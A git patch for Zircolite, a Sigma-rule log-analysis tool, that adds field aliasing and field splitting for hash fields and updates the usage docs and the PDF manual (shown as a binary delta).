From 0dfaa7a171f923bc5bff4b36502740b502d13e88 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Tue, 2 May 2023 22:16:28 +0200 Subject: [PATCH 1/3] Add field splitting, field aliases Update docs --- .gitignore | 3 +- config/fieldMappings.json | 9 + docs/Readme.md | 1 + docs/Usage.md | 161 +- docs/Zircolite_manual.pdf | Bin 661727 -> 669757 bytes rules/rules_linux.json | 2561 +- rules/rules_windows_generic.json | 23932 ++++++------ rules/rules_windows_generic_full.json | 42086 +++++++++++----------- rules/rules_windows_generic_high.json | 23932 ++++++------ rules/rules_windows_generic_medium.json | 39176 ++++++++++---------- rules/rules_windows_sysmon.json | 23932 ++++++------ rules/rules_windows_sysmon_full.json | 42086 +++++++++++----------- rules/rules_windows_sysmon_high.json | 23932 ++++++------ rules/rules_windows_sysmon_medium.json | 39176 ++++++++++---------- zircolite.py | 65 +- zircolite_dev.py | 56 +- 16 files changed, 129722 insertions(+), 131386 deletions(-) diff --git a/.gitignore b/.gitignore index e19cc5b..61ed81c 100644 --- a/.gitignore +++ b/.gitignore @@ -33,4 +33,5 @@ tmp *.evtx *.evtx_data *.tar -*.tar.sha256 \ No newline at end of file +*.tar.sha256 +.pdm-python diff --git a/config/fieldMappings.json b/config/fieldMappings.json index f7ae020..d095b97 100644 --- a/config/fieldMappings.json +++ b/config/fieldMappings.json @@ -259,5 +259,14 @@ "Event.EventData.updateTitle":"updateTitle", "Event.EventData.ParentIntegrityLevel":"ParentIntegrityLevel", "Event.EventData.ParentUser":"ParentUser" + }, + "alias": + { + }, + "split": + { + "Hash": {"separator":",", "equal":"="}, + "Hashes": {"separator":",", "equal":"="}, + "ConfigurationFileHash": {"separator":",", "equal":"="} } } \ No newline at end of file diff --git a/docs/Readme.md b/docs/Readme.md index ea8fca9..cd9eecb 100644 --- a/docs/Readme.md +++ b/docs/Readme.md @@ -4,6 +4,7 @@ * [Requirements and Installation](Usage.md#requirements-and-installation) * [Basic usage](Usage.md#basic-usage) +* [Field mappings, field exclusions, value exclusions, field aliases and field splitting](Usage.md#field-mappings-field-exclusions-value-exclusions-field-aliases-and-field-splitting) * [Generate your own rulesets](Usage.md#generate-your-own-rulesets) * [Why you should make your own rulesets](Usage.md#why-you-should-make-your-own-rulesets) * [Generate embedded versions](#generate-embedded-versions) diff --git a/docs/Usage.md b/docs/Usage.md index d2c24d3..fb79d71 100644 --- a/docs/Usage.md +++ b/docs/Usage.md @@ -4,6 +4,7 @@ * [Requirements and Installation](#requirements-and-installation) * [Basic usage](#basic-usage) +* [Field mappings, field exclusions, value exclusions, field aliases and field splitting](#field-mappings-field-exclusions-value-exclusions-field-aliases-and-field-splitting) * [Generate your own rulesets](#generate-your-own-rulesets) * [Why you should make your own rulesets](#why-you-should-make-your-own-rulesets) * [Generate embedded versions](#generate-embedded-versions) @@ -135,6 +136,150 @@ If you need to re-execute Zircolite, you can do it directly using the SQLite da --- +### Field mappings, field exclusions, value exclusions, field aliases and field splitting + +Sometimes your logs need some transformations to allow your rules to match against them. Zircolite has multiple mechanisms for this. The configuration of these mechanisms is provided by a file that can be found in the [config](../config/) directory of the repository. It is also possible to provide your own configuration woth the `--config` or `-c` options. + +The configuration file has the following structure : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : + { + "field_name_1": "new_field_name_1", + "field_name_2": "new_field_name_2" + }, + "alias": + { + "field_alias_1": "alias_1" + }, + "split": + { + "field_name_split": {"separator":",", "equal":"="} + } +} +``` + +#### Field mappings + +**field mappings** allow you to rename a field from your raw logs (the ones that you want to analyze with Zircolite). Zircolite already uses this mechanism to rename nested JSON fields. You can check all the builtin field mappings [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). + +For example, if you want to rename the field "CommandLine" in **your raw logs** to "cmdline", you can add the following in the [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json) file : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : + { + "CommandLine": "cmdline" + }, + "alias":{}, + "split": {} +} +``` + +Please keep in mind that as opposed to field alias, the original field name is not kept. + +#### Field exclusions + +**field exclusions** allow you to exclude a field. Zircolite already uses this mechanism to exclude the `xlmns` field. You can check all the builtin field exclusions [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). + +#### Value exclusions + +**value exclusions** allow you to remove field which value is to be excluded. Zircolite already uses this mechanism to remove *null* and empty values. You can check all the builtin value exclusions [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). + +#### Field aliases + +**field aliases** allow you to have multiple fields with different name but the same value. It is pretty similar to field mapping but you keep the original value. Field aliases can be used on original field names but also on mapped field names and splitted fields. + +Let's say you have this event log in JSON format (the event has been deliberately truncated): + +```json + { + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", + } +``` + +Let's say you are not sure all your rules use the "CommandLine" field but you remember that some of them use the "cmdline" field. To avoid any problems you could use an alias for the "CommandLine" field like this : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : {}, + "alias":{ + "CommandLine": "cmdline" + }, + "split": {} +} +``` + +With this configuration, the event log used to apply Sigma rules will look like this : + +```json + { + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", + } +``` + +Be careful when using aliases because the data is stored multiple times. + +#### Field splitting + +**field aliases** allow you to split fields that contain key,value pairs. Zircolite already uses this mechanism to handle hash/hashes fields in Sysmon logs. You can check all the builtin field splittings [here](https://github.com/wagga40/Zircolite/blob/master/config/fieldMappings.json). Moreover, Field aliases can be applied to splitted fields. + +For example, let's say we have this Sysmon event log : + +```json + { + "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", + "EventID": 1 + } +``` + +With the following configuration, Zircolite will split the `hashes` field like this : + +```json +{ + "exclusions" : [], + "useless" : [], + "mappings" : {}, + "alias":{}, + "split": { + "Hashes": {"separator":",", "equal":"="} + } +} +``` + +The final event log used to apply Sigma rules will look like this : + +```json + { + "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", + "MD5": "04029E121A0CFA5991749937DD22A1D9", + "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", + "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", + "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", + "EventID": 1 + } +``` + +--- + ### Generate your own rulesets Default rulesets are already provided in the `rules` directory. These rulesets only are the conversion of the rules located in [rules/windows](https://github.com/SigmaHQ/sigma/tree/master/rules/windows) directory of the Sigma repository. These rulesets are provided to use Zircolite out-of-the-box but [you should generate your own rulesets](#why-you-should-build-your-own-rulesets). @@ -143,18 +288,22 @@ Default rulesets are already provided in the `rules` directory. These rulesets o #### With sigmatools -Zircolite use the SIGMA rules in JSON format. To generate your ruleset you need the official sigmatools (**version 0.21 minimum**) : +Zircolite use the SIGMA rules in JSON format. Since the SQLite backend is not yet available in pySigma, you need to generate your ruleset with the official [legacy-sigmatools](https://github.com/SigmaHQ/legacy-sigmatools) (**version 0.21 minimum**) : + +```shell +pip3 install sigmatools +``` +since you need to access the configuration files directly it is easier to also clone the repository : ```shell -git clone https://github.com/SigmaHQ/sigma.git -cd sigma +git clone https://github.com/SigmaHQ/legacy-sigmatools.git +cd legacy-sigmools ``` -**You must have the sigma dependencies installed, check [here](https://github.com/SigmaHQ/sigma#installation) :** ##### Sysmon rulesets (when investigated endpoints have Sysmon logs) ```shell -tools/sigmac \ +sigmac \ -t sqlite \ -c tools/config/generic/sysmon.yml \ -c tools/config/generic/powershell.yml \ @@ -177,7 +326,7 @@ Where : ##### Generic rulesets (when investigated endpoints _don't_ have Sysmon logs) ```shell -tools/sigmac \ +sigmac \ -t sqlite \ -c tools/config/generic/windows-audit.yml \ -c tools/config/generic/powershell.yml \ diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index 2a3226934bc353af03c3a1ddfede99d83ef4a942..e4ae9aba955147384a6813345084d4585bdb3456 100644 GIT binary patch delta 66297 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 